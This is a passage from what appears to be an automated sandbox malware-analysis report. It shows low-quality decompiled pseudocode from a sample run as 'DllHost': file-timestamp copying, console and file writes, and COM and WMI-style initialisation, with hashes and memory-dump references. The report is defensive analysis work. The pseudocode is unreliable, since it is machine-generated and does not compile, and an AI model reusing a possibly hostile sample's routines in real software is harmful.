                                                                                                                                                              • Opcode Fuzzy Hash: 7d65298988323243bff5a5ad8deacda80ed3290f8eb2ca76a4b7fc4b4f0f433c
                                                                                                                                                              • Instruction Fuzzy Hash: DCC1D922E08E8682F652AF14B4442B9A6B0FB91BA8F850171DE4D13795CE7CE4DFD721
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C45B0 Relevance: 10.6, APIs: 7, Instructions: 144timefileCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 28%
                                                                                                                                                              			E00007FF77FF7191C45B0(void* __ebx, void* __ecx, void* __edx, long long __rcx, intOrPtr* __rdx, void* __r8, void* __r9, void* __r11) {
				void* __rbx;
				void* __rsi;
				void* __rbp;
				void* _t57;
				void* _t70;
				signed long long _t90;
				intOrPtr _t95;
				intOrPtr* _t102;
				intOrPtr _t128;
				intOrPtr _t138;
				void* _t139;
				void* _t140;
				void* _t141;
				signed long long _t142;
				long long _t153;

				_t70 = __ebx;
				_t140 = _t141 - 0xb0;
				_t142 = _t141 - 0x1b0;
				_t90 =  *0x192190a0; // 0x590452ce5669
				 *(_t140 + 0xa0) = _t90 ^ _t142;
				_t139 = __r8;
				_t102 = __rdx;
				_t153 = __rcx;
				E00007FF77FF7191C8770(_t140 + 0x80);
				E00007FF77FF7191C86E0(); // executed
				_t128 =  *((intOrPtr*)(_t140 + 0x98));
				if (_t128 - 0x10 < 0) goto 0x191c463c;
				if (_t128 + 1 - 0x1000 < 0) goto 0x191c4637;
				if ( *((intOrPtr*)(_t140 + 0x80)) -  *((intOrPtr*)( *((intOrPtr*)(_t140 + 0x80)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191c47cf;
				0x191d23d0();
				if ( *((long long*)(_t102 + 0x18)) - 0x10 < 0) goto 0x191c4649;
				 *((intOrPtr*)(_t142 + 0x20)) = 1;
				r9d = 0x40;
				r8d = __r9 - 0x20;
				E00007FF77FF7191C0B80(_t70, __ecx, _t102, _t142 + 0x70,  *_t102, __r8, _t140, __r11); // executed
				_t95 =  *((intOrPtr*)(_t142 + 0x70));
				if ( *((intOrPtr*)(_t140 +  *((intOrPtr*)(_t95 + 4)) - 0x80)) != 0) goto 0x191c4737;
				_t57 = E00007FF77FF7191C47E0(0xffffffff, _t102, _t153, _t142 + 0x70, _t139); // executed
				r14d = 0;
				_t79 =  ==  ? r14d : 0xffffffff;
				E00007FF77FF7191C3130(_t57, _t95, _t142 + 0x70);
				if ( *((long long*)(_t102 + 0x18)) - 0x10 < 0) goto 0x191c46aa;
				 *((long long*)(_t142 + 0x30)) = _t153;
				 *((intOrPtr*)(_t142 + 0x28)) = r14d;
				 *((intOrPtr*)(_t142 + 0x20)) = 3;
				r9d = 0;
				r8d = 0;
				CreateFileA(??, ??, ??, ??, ??, ??, ??); // executed
				if (_t95 == 0xffffffff) goto 0x191c4742;
				GetFileTime(??, ??, ??, ??);
				DosDateTimeToFileTime(??, ??, ??);
				LocalFileTimeToFileTime(??, ??);
				SetFileTime(??, ??, ??, ??); // executed
				CloseHandle(??);
				goto 0x191c4742;
				E00007FF77FF7191C3130(_t95 - 0xffffffff, _t95, _t142 + 0x70);
				 *((long long*)(_t142 +  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x70)) + 4)) + 0x70)) = 0x191f99f8;
				 *((intOrPtr*)(_t142 +  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x70)) + 4)) + 0x6c)) =  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x70)) + 4)) - 0xa8;
				E00007FF77FF7191B9470( *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x70)) + 4)) - 0xa8, _t142 + 0x78);
				 *((long long*)(_t142 +  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x70)) + 4)) + 0x70)) = 0x191f97a8;
				_t138 =  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x70)) + 4));
				r8d = _t138 - 0x10;
				 *((intOrPtr*)(_t142 + _t138 + 0x6c)) = r8d;
				 *((long long*)(_t140 + 0x18)) = 0x191f9778;
				E00007FF77FF7191D1494(_t140 + 0x18);
				_t68 =  ==  ? r14d : 0xffffffff;
				return E00007FF77FF7191D23B0( ==  ? r14d : 0xffffffff,  *(_t139 + 0x50) >> 0x10,  *(_t140 + 0xa0) ^ _t142);
			}


















                                                                                                                                                              0x7ff7191c45b0
                                                                                                                                                              0x7ff7191c45b7
                                                                                                                                                              0x7ff7191c45bf
                                                                                                                                                              0x7ff7191c45c6
                                                                                                                                                              0x7ff7191c45d0
                                                                                                                                                              0x7ff7191c45d7
                                                                                                                                                              0x7ff7191c45da
                                                                                                                                                              0x7ff7191c45dd
                                                                                                                                                              0x7ff7191c45ec
                                                                                                                                                              0x7ff7191c45f5
                                                                                                                                                              0x7ff7191c45fb
                                                                                                                                                              0x7ff7191c4606
                                                                                                                                                              0x7ff7191c461c
                                                                                                                                                              0x7ff7191c4631
                                                                                                                                                              0x7ff7191c4637
                                                                                                                                                              0x7ff7191c4644
                                                                                                                                                              0x7ff7191c4649
                                                                                                                                                              0x7ff7191c4651
                                                                                                                                                              0x7ff7191c4657
                                                                                                                                                              0x7ff7191c4660
                                                                                                                                                              0x7ff7191c4666
                                                                                                                                                              0x7ff7191c4674
                                                                                                                                                              0x7ff7191c4685
                                                                                                                                                              0x7ff7191c468a
                                                                                                                                                              0x7ff7191c468f
                                                                                                                                                              0x7ff7191c4698
                                                                                                                                                              0x7ff7191c46a5
                                                                                                                                                              0x7ff7191c46aa
                                                                                                                                                              0x7ff7191c46af
                                                                                                                                                              0x7ff7191c46b4
                                                                                                                                                              0x7ff7191c46bc
                                                                                                                                                              0x7ff7191c46bf
                                                                                                                                                              0x7ff7191c46ca
                                                                                                                                                              0x7ff7191c46d7
                                                                                                                                                              0x7ff7191c46eb
                                                                                                                                                              0x7ff7191c46fe
                                                                                                                                                              0x7ff7191c470e
                                                                                                                                                              0x7ff7191c4726
                                                                                                                                                              0x7ff7191c472f
                                                                                                                                                              0x7ff7191c4735
                                                                                                                                                              0x7ff7191c473c
                                                                                                                                                              0x7ff7191c4752
                                                                                                                                                              0x7ff7191c4766
                                                                                                                                                              0x7ff7191c476f
                                                                                                                                                              0x7ff7191c4784
                                                                                                                                                              0x7ff7191c478e
                                                                                                                                                              0x7ff7191c4792
                                                                                                                                                              0x7ff7191c4796
                                                                                                                                                              0x7ff7191c47a2
                                                                                                                                                              0x7ff7191c47aa
                                                                                                                                                              0x7ff7191c47b0
                                                                                                                                                              0x7ff7191c47ce

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileTime$CloseCreateDateHandleLocal_invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3124557046-0
                                                                                                                                                              • Opcode ID: 673c4a491ad22f5fd9229a78d95826f26e3f45880a67ac69224684544f87f5bf
                                                                                                                                                              • Instruction ID: dbf0bf1b82bc710d2cd766c4e1cbc70c4a084531a2b580038a0e106b59914876
                                                                                                                                                              • Opcode Fuzzy Hash: 673c4a491ad22f5fd9229a78d95826f26e3f45880a67ac69224684544f87f5bf
                                                                                                                                                              • Instruction Fuzzy Hash: 14517432618E8685FB10EF25F4543A9A371FB85BA8F904231DB5D036A9DF3CD58ADB10
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E684C Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 49%
                                                                                                                                                              			E00007FF77FF7191E684C(signed long long __ecx, void* __edi, signed int* __rax, unsigned int __rbx, signed short* __rdx, void* __r10, void* __r11, long long _a32) {
				signed short _v72;
				void* _v84;
				unsigned int _v88;
				intOrPtr _v96;
				intOrPtr _v100;
				long _v104;
				signed int _v120;
				void* __rsi;
				void* __rbp;
				void* _t89;
				int _t97;
				long _t98;
				intOrPtr _t109;
				signed int _t118;
				unsigned int _t123;
				void* _t129;
				intOrPtr _t150;
				intOrPtr _t162;
				unsigned long long _t168;
				signed int* _t170;
				unsigned int _t171;
				signed short* _t187;
				long _t188;
				void* _t190;
				void* _t199;
				signed long long _t200;
				void* _t201;
				signed long long _t203;
				void* _t204;
				signed short* _t205;
				signed long long _t207;

				_t199 = __r11;
				_t184 = __rdx;
				_t171 = __rbx;
				_t129 = __edi;
				_a32 = __rbx;
				r14d = r8d;
				_t187 = __rdx;
				_t200 = __ecx;
				if (r8d == 0) goto 0x191e6b0c;
				if (__rdx != 0) goto 0x191e689a;
				E00007FF77FF7191DC834(__rax);
				 *__rax =  *__rax & 0x00000000;
				E00007FF77FF7191DC854(__rax);
				 *__rax = 0x16;
				E00007FF77FF7191DA5D8();
				goto 0x191e6b0e;
				_t203 = _t200 >> 6;
				_t207 = _t200 + _t200 * 8;
				sil =  *((intOrPtr*)(0x1921b700 + 0x39 + _t207 * 8));
				if (_t188 - 1 - 1 > 0) goto 0x191e68cb;
				if (( !r14d & 0x00000001) == 0) goto 0x191e687a;
				if (( *(0x1921b700 + 0x38 + _t207 * 8) & 0x00000020) == 0) goto 0x191e68e1;
				_t17 = _t184 + 2; // 0x2
				r8d = _t17;
				E00007FF77FF7191E8FF8( *((intOrPtr*)(0x1921b700 + _t203 * 8)), __rdx);
				_v88 = __rbx;
				if (E00007FF77FF7191F1C3C(r12d, _t200) == 0) goto 0x191e69fa;
				_t162 =  *((intOrPtr*)(0x1921b700 + _t203 * 8));
				if ( *(0x1921b700 + 0x38 + _t207 * 8) >= 0) goto 0x191e69fa;
				E00007FF77FF7191E5AC4(_t162, __rbx, _t184, _t188);
				if ( *((intOrPtr*)( *((intOrPtr*)(_t162 + 0x90)) + 0x138)) != _t171) goto 0x191e6938;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x1921b700 + _t203 * 8)) + 0x39 + _t207 * 8)) == 0) goto 0x191e69fa;
				if (GetConsoleMode(??, ??) == 0) goto 0x191e69fa;
				if (sil == 0) goto 0x191e69dc;
				sil = sil - 1;
				if (sil - 1 > 0) goto 0x191e6a98;
				_t201 = _t187 + _t204;
				_v104 = _t188;
				_t205 = _t187;
				if (_t187 - _t201 >= 0) goto 0x191e69d5;
				_v72 =  *_t205 & 0x0000ffff;
				_t89 = E00007FF77FF7191F1ED8( *_t205 & 0xffff);
				_t118 = _v72 & 0x0000ffff;
				if (_t89 != _t118) goto 0x191e69cc;
				_t109 = _v100 + 2;
				_v100 = _t109;
				if (_t118 != 0xa) goto 0x191e69c1;
				if (E00007FF77FF7191F1ED8(0xd) != 0xd) goto 0x191e69cc;
				_v100 = _t109 + 1;
				if ( &(_t205[1]) - _t201 >= 0) goto 0x191e69d5;
				goto 0x191e6981;
				_v104 = GetLastError();
				goto 0x191e6a8e;
				r9d = r14d;
				E00007FF77FF7191E5EF4(_t91, r12d, 1,  &(_t205[1]) - _t201, _t171,  &_v104,  &_v72, _t187, __r10);
				asm("movsd xmm0, [eax]");
				goto 0x191e6a93;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x1921b700 + _t203 * 8)) + 0x38 + _t207 * 8)) -  *0x7FF71921B708 >= 0) goto 0x191e6a5b;
				_t150 = sil;
				if (_t150 == 0) goto 0x191e6a47;
				if (_t150 == 0) goto 0x191e6a33;
				if (sil - 1 != 1) goto 0x191e6a98;
				r9d = r14d;
				E00007FF77FF7191E64D4( *0x7FF71921B708, r12d, 0x1921b700, _t171,  &_v104, _t190, _t187, __r10, _t199);
				goto 0x191e69ee;
				r9d = r14d;
				E00007FF77FF7191E65F0(r12d, _t129, 0x1921b700, _t171,  &_v104, _t190, _t187, __r10, _t199);
				goto 0x191e69ee;
				r9d = r14d;
				E00007FF77FF7191E63D0( *0x7FF71921B708, sil - 1, r12d, 0x1921b700, _t171,  &_v104, _t190, _t187, __r10, _t199);
				goto 0x191e69ee;
				r8d = r14d;
				_v120 = _v120 & 0x1921b700;
				_v104 = 0x1921b700;
				_v96 = 0;
				_t97 = WriteFile(??, ??, ??, ??, ??); // executed
				if (_t97 != 0) goto 0x191e6a8b;
				_t98 = GetLastError();
				_v104 = _t98;
				asm("movsd xmm0, [ebp-0x30]");
				asm("movsd [ebp-0x20], xmm0");
				_t168 = _v88 >> 0x20;
				if (_t98 != 0) goto 0x191e6b05;
				_t123 = _v88;
				if (_t123 == 0) goto 0x191e6ad5;
				if (_t123 != 5) goto 0x191e6acb;
				E00007FF77FF7191DC854(_t168);
				 *_t168 = 9;
				E00007FF77FF7191DC834(_t168);
				 *_t168 = 5;
				goto 0x191e6892;
				E00007FF77FF7191DC7E4(_t123, _t168, _t171);
				goto 0x191e6892;
				_t170 =  *((intOrPtr*)(0x1921b700 + _t203 * 8));
				if (( *(0x1921b700 + 0x38 + _t207 * 8) & 0x00000040) == 0) goto 0x191e6aed;
				if ( *_t187 == 0x1a) goto 0x191e6b0c;
				E00007FF77FF7191DC854(_t170);
				 *0x1921b700 = 0x1c;
				E00007FF77FF7191DC834(_t170);
				 *_t170 =  *_t170 & 0x00000000;
				goto 0x191e6892;
				goto 0x191e6b0e;
				return 0;
			}


































                                                                                                                                                              0x7ff7191e684c
                                                                                                                                                              0x7ff7191e684c
                                                                                                                                                              0x7ff7191e684c
                                                                                                                                                              0x7ff7191e684c
                                                                                                                                                              0x7ff7191e684c
                                                                                                                                                              0x7ff7191e6863
                                                                                                                                                              0x7ff7191e6866
                                                                                                                                                              0x7ff7191e6869
                                                                                                                                                              0x7ff7191e686f
                                                                                                                                                              0x7ff7191e6878
                                                                                                                                                              0x7ff7191e687a
                                                                                                                                                              0x7ff7191e687f
                                                                                                                                                              0x7ff7191e6882
                                                                                                                                                              0x7ff7191e6887
                                                                                                                                                              0x7ff7191e688d
                                                                                                                                                              0x7ff7191e6895
                                                                                                                                                              0x7ff7191e68aa
                                                                                                                                                              0x7ff7191e68ae
                                                                                                                                                              0x7ff7191e68b6
                                                                                                                                                              0x7ff7191e68c0
                                                                                                                                                              0x7ff7191e68c9
                                                                                                                                                              0x7ff7191e68d1
                                                                                                                                                              0x7ff7191e68d8
                                                                                                                                                              0x7ff7191e68d8
                                                                                                                                                              0x7ff7191e68dc
                                                                                                                                                              0x7ff7191e68e6
                                                                                                                                                              0x7ff7191e68f1
                                                                                                                                                              0x7ff7191e68fe
                                                                                                                                                              0x7ff7191e6907
                                                                                                                                                              0x7ff7191e690d
                                                                                                                                                              0x7ff7191e6920
                                                                                                                                                              0x7ff7191e6932
                                                                                                                                                              0x7ff7191e6954
                                                                                                                                                              0x7ff7191e695d
                                                                                                                                                              0x7ff7191e695f
                                                                                                                                                              0x7ff7191e6966
                                                                                                                                                              0x7ff7191e696e
                                                                                                                                                              0x7ff7191e6972
                                                                                                                                                              0x7ff7191e6976
                                                                                                                                                              0x7ff7191e697c
                                                                                                                                                              0x7ff7191e6988
                                                                                                                                                              0x7ff7191e698c
                                                                                                                                                              0x7ff7191e6991
                                                                                                                                                              0x7ff7191e6998
                                                                                                                                                              0x7ff7191e699a
                                                                                                                                                              0x7ff7191e699d
                                                                                                                                                              0x7ff7191e69a4
                                                                                                                                                              0x7ff7191e69b8
                                                                                                                                                              0x7ff7191e69bc
                                                                                                                                                              0x7ff7191e69c8
                                                                                                                                                              0x7ff7191e69ca
                                                                                                                                                              0x7ff7191e69d2
                                                                                                                                                              0x7ff7191e69d7
                                                                                                                                                              0x7ff7191e69dc
                                                                                                                                                              0x7ff7191e69e9
                                                                                                                                                              0x7ff7191e69ee
                                                                                                                                                              0x7ff7191e69f5
                                                                                                                                                              0x7ff7191e6a0a
                                                                                                                                                              0x7ff7191e6a10
                                                                                                                                                              0x7ff7191e6a13
                                                                                                                                                              0x7ff7191e6a18
                                                                                                                                                              0x7ff7191e6a1d
                                                                                                                                                              0x7ff7191e6a1f
                                                                                                                                                              0x7ff7191e6a2c
                                                                                                                                                              0x7ff7191e6a31
                                                                                                                                                              0x7ff7191e6a33
                                                                                                                                                              0x7ff7191e6a40
                                                                                                                                                              0x7ff7191e6a45
                                                                                                                                                              0x7ff7191e6a47
                                                                                                                                                              0x7ff7191e6a54
                                                                                                                                                              0x7ff7191e6a59
                                                                                                                                                              0x7ff7191e6a66
                                                                                                                                                              0x7ff7191e6a69
                                                                                                                                                              0x7ff7191e6a71
                                                                                                                                                              0x7ff7191e6a75
                                                                                                                                                              0x7ff7191e6a78
                                                                                                                                                              0x7ff7191e6a80
                                                                                                                                                              0x7ff7191e6a82
                                                                                                                                                              0x7ff7191e6a88
                                                                                                                                                              0x7ff7191e6a8e
                                                                                                                                                              0x7ff7191e6a93
                                                                                                                                                              0x7ff7191e6a9c
                                                                                                                                                              0x7ff7191e6aa2
                                                                                                                                                              0x7ff7191e6aa4
                                                                                                                                                              0x7ff7191e6aa9
                                                                                                                                                              0x7ff7191e6aae
                                                                                                                                                              0x7ff7191e6ab0
                                                                                                                                                              0x7ff7191e6ab5
                                                                                                                                                              0x7ff7191e6abb
                                                                                                                                                              0x7ff7191e6ac0
                                                                                                                                                              0x7ff7191e6ac6
                                                                                                                                                              0x7ff7191e6acb
                                                                                                                                                              0x7ff7191e6ad0
                                                                                                                                                              0x7ff7191e6adc
                                                                                                                                                              0x7ff7191e6ae6
                                                                                                                                                              0x7ff7191e6aeb
                                                                                                                                                              0x7ff7191e6aed
                                                                                                                                                              0x7ff7191e6af2
                                                                                                                                                              0x7ff7191e6af8
                                                                                                                                                              0x7ff7191e6afd
                                                                                                                                                              0x7ff7191e6b00
                                                                                                                                                              0x7ff7191e6b0a
                                                                                                                                                              0x7ff7191e6b25

                                                                                                                                                              APIs
                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7191E688D
                                                                                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7191E680B,?,?,FFFFFFFE,00007FF7191E50C2), ref: 00007FF7191E694C
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7191E680B,?,?,FFFFFFFE,00007FF7191E50C2), ref: 00007FF7191E69CC
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2210144848-0
                                                                                                                                                              • Opcode ID: 6fc08e10a9d61f4fb81cebe2106ff699c531d4e5e7fe382f550567236f19aa69
                                                                                                                                                              • Instruction ID: 49b6a3d107c9ee30e3aa8fe75d25f82b272eddd6ba99841bc0d8a130cf326b36
                                                                                                                                                              • Opcode Fuzzy Hash: 6fc08e10a9d61f4fb81cebe2106ff699c531d4e5e7fe382f550567236f19aa69
                                                                                                                                                              • Instruction Fuzzy Hash: 3D81A722E18E1686F752BF65A4406BCA670FB447ACFC44535DA0E63695DF3CA48FE320
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191BDFE0 Relevance: 7.6, APIs: 5, Instructions: 92comCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 20%
                                                                                                                                                              			E00007FF77FF7191BDFE0(long long __rbx, void* __rcx, long long __rsi) {
				void* _t47;
				void* _t48;
				void* _t53;
				signed long long _t78;
				long long _t81;
				long long* _t86;
				long long* _t87;
				void* _t91;
				void* _t102;
				void* _t104;
				void* _t110;
				void* _t111;
				void* _t113;
				signed long long _t114;
				void* _t116;
				long long _t119;
				void* _t121;
				void* _t123;

				 *((long long*)(_t113 + 0x10)) = __rbx;
				 *((long long*)(_t113 + 0x18)) = __rsi;
				_t111 = _t113 - 0x37;
				_t114 = _t113 - 0x100;
				_t78 =  *0x192190a0; // 0x590452ce5669
				 *(_t111 + 0x27) = _t78 ^ _t114;
				r8d = 0xc7;
				_t48 = E00007FF77FF7191D4A30(_t47, 0, __rcx, _t102, _t116);
				__imp__CoInitializeEx(_t123, _t121, _t119, _t104, _t110);
				if (_t48 < 0) goto 0x191be1bc;
				r12d = 0;
				 *((long long*)(_t114 + 0x40)) = _t119;
				 *((intOrPtr*)(_t114 + 0x38)) = r12d;
				 *((long long*)(_t114 + 0x30)) = _t119;
				 *((intOrPtr*)(_t114 + 0x28)) = 3;
				 *((intOrPtr*)(_t114 + 0x20)) = r12d;
				r9d = 0;
				r8d = 0;
				__imp__CoInitializeSecurity(); // executed
				if (_t48 < 0) goto 0x191be1b6;
				 *((long long*)(_t111 - 0x51)) = _t119;
				 *((long long*)(_t114 + 0x20)) = _t111 - 0x51;
				_t14 = _t119 + 1; // 0x1
				r8d = _t14;
				__imp__CoCreateInstance();
				if (_t48 < 0) goto 0x191be1b6;
				 *((long long*)(_t111 - 0x59)) = _t119;
				_t81 =  *((intOrPtr*)(_t111 - 0x51));
				_t91 =  *_t81;
				E00007FF77FF7191D23D8(_t81, _t91);
				_t86 = _t81;
				 *((long long*)(_t111 - 0x79)) = _t81;
				if (_t81 == 0) goto 0x191be0ef;
				asm("xorps xmm0, xmm0");
				asm("movups [ebx], xmm0");
				 *((long long*)(_t86 + 0x10)) = _t81;
				 *((long long*)(_t86 + 8)) = _t119;
				 *((intOrPtr*)(_t86 + 0x10)) = 1;
				__imp__#2();
				 *_t86 = _t81;
				if (_t81 == 0) goto 0x191be54d;
				goto 0x191be0f2;
				_t87 = _t119;
				 *((long long*)(_t111 - 0x71)) = _t87;
				if (_t87 == 0) goto 0x191be558;
				 *((long long*)(_t114 + 0x40)) = _t111 - 0x59;
				 *((long long*)(_t114 + 0x38)) = _t119;
				 *((long long*)(_t114 + 0x30)) = _t119;
				 *((intOrPtr*)(_t114 + 0x28)) = r12d;
				 *((long long*)(_t114 + 0x20)) = _t119;
				r9d = 0;
				r8d = 0;
				 *((long long*)( *((intOrPtr*)(_t91 + 0x18))))();
				asm("lock xadd [ebx+0x10], ecx");
				if (0xffffffff != 1) goto 0x191be16c;
				if ( *_t87 == 0) goto 0x191be14d;
				__imp__#6();
				 *_t87 = _t119;
				if ( *((intOrPtr*)(_t87 + 8)) == 0) goto 0x191be15f;
				0x191d23d0();
				 *((long long*)(_t87 + 8)) = _t119;
				0x191d23d0();
				if (0 < 0) goto 0x191be1ac;
				 *((intOrPtr*)(_t114 + 0x38)) = r12d;
				 *((long long*)(_t114 + 0x30)) = _t119;
				 *((intOrPtr*)(_t114 + 0x28)) = 3;
				 *((intOrPtr*)(_t114 + 0x20)) = 3;
				r9d = 0;
				r8d = 0;
				__imp__CoSetProxyBlanket();
				if (0 >= 0) goto 0x191be1e4;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t111 - 0x59)))) + 0x10))();
				_t53 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t111 - 0x51)))) + 0x10))();
				__imp__CoUninitialize();
				return E00007FF77FF7191D23B0(_t53, 0xffffffff,  *(_t111 + 0x27) ^ _t114);
			}





















                                                                                                                                                              0x7ff7191bdfe0
                                                                                                                                                              0x7ff7191bdfe5
                                                                                                                                                              0x7ff7191bdff2
                                                                                                                                                              0x7ff7191bdff7
                                                                                                                                                              0x7ff7191bdffe
                                                                                                                                                              0x7ff7191be008
                                                                                                                                                              0x7ff7191be011
                                                                                                                                                              0x7ff7191be017
                                                                                                                                                              0x7ff7191be020
                                                                                                                                                              0x7ff7191be028
                                                                                                                                                              0x7ff7191be02e
                                                                                                                                                              0x7ff7191be031
                                                                                                                                                              0x7ff7191be036
                                                                                                                                                              0x7ff7191be03b
                                                                                                                                                              0x7ff7191be040
                                                                                                                                                              0x7ff7191be048
                                                                                                                                                              0x7ff7191be04d
                                                                                                                                                              0x7ff7191be050
                                                                                                                                                              0x7ff7191be05a
                                                                                                                                                              0x7ff7191be062
                                                                                                                                                              0x7ff7191be068
                                                                                                                                                              0x7ff7191be070
                                                                                                                                                              0x7ff7191be07e
                                                                                                                                                              0x7ff7191be07e
                                                                                                                                                              0x7ff7191be08a
                                                                                                                                                              0x7ff7191be092
                                                                                                                                                              0x7ff7191be098
                                                                                                                                                              0x7ff7191be09c
                                                                                                                                                              0x7ff7191be0a0
                                                                                                                                                              0x7ff7191be0ac
                                                                                                                                                              0x7ff7191be0b1
                                                                                                                                                              0x7ff7191be0b4
                                                                                                                                                              0x7ff7191be0bb
                                                                                                                                                              0x7ff7191be0bd
                                                                                                                                                              0x7ff7191be0c2
                                                                                                                                                              0x7ff7191be0c5
                                                                                                                                                              0x7ff7191be0c9
                                                                                                                                                              0x7ff7191be0cd
                                                                                                                                                              0x7ff7191be0db
                                                                                                                                                              0x7ff7191be0e1
                                                                                                                                                              0x7ff7191be0e7
                                                                                                                                                              0x7ff7191be0ed
                                                                                                                                                              0x7ff7191be0ef
                                                                                                                                                              0x7ff7191be0f2
                                                                                                                                                              0x7ff7191be0f9
                                                                                                                                                              0x7ff7191be103
                                                                                                                                                              0x7ff7191be108
                                                                                                                                                              0x7ff7191be10d
                                                                                                                                                              0x7ff7191be112
                                                                                                                                                              0x7ff7191be117
                                                                                                                                                              0x7ff7191be11c
                                                                                                                                                              0x7ff7191be11f
                                                                                                                                                              0x7ff7191be129
                                                                                                                                                              0x7ff7191be132
                                                                                                                                                              0x7ff7191be13a
                                                                                                                                                              0x7ff7191be142
                                                                                                                                                              0x7ff7191be144
                                                                                                                                                              0x7ff7191be14a
                                                                                                                                                              0x7ff7191be154
                                                                                                                                                              0x7ff7191be156
                                                                                                                                                              0x7ff7191be15b
                                                                                                                                                              0x7ff7191be167
                                                                                                                                                              0x7ff7191be16e
                                                                                                                                                              0x7ff7191be170
                                                                                                                                                              0x7ff7191be175
                                                                                                                                                              0x7ff7191be17a
                                                                                                                                                              0x7ff7191be182
                                                                                                                                                              0x7ff7191be18a
                                                                                                                                                              0x7ff7191be18d
                                                                                                                                                              0x7ff7191be198
                                                                                                                                                              0x7ff7191be1a0
                                                                                                                                                              0x7ff7191be1a9
                                                                                                                                                              0x7ff7191be1b3
                                                                                                                                                              0x7ff7191be1b6
                                                                                                                                                              0x7ff7191be1e3

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Initialize$CreateInstanceSecurityUninitialize
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 374467530-0
                                                                                                                                                              • Opcode ID: 31dc1ae78160c0bc2cc1bda152d586d5e071129c97ca68f9e38efee2764e703a
                                                                                                                                                              • Instruction ID: aa8b1fc98ebad265b1a357916427d7f28ba3d5c410c4272cd5b615fbd1230d70
                                                                                                                                                              • Opcode Fuzzy Hash: 31dc1ae78160c0bc2cc1bda152d586d5e071129c97ca68f9e38efee2764e703a
                                                                                                                                                              • Instruction Fuzzy Hash: F8318D32B08E4186F710EF61F804AA9B3B6FB48768F844535DE4E47654EE3CE08AD750
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C47E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 123COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 36%
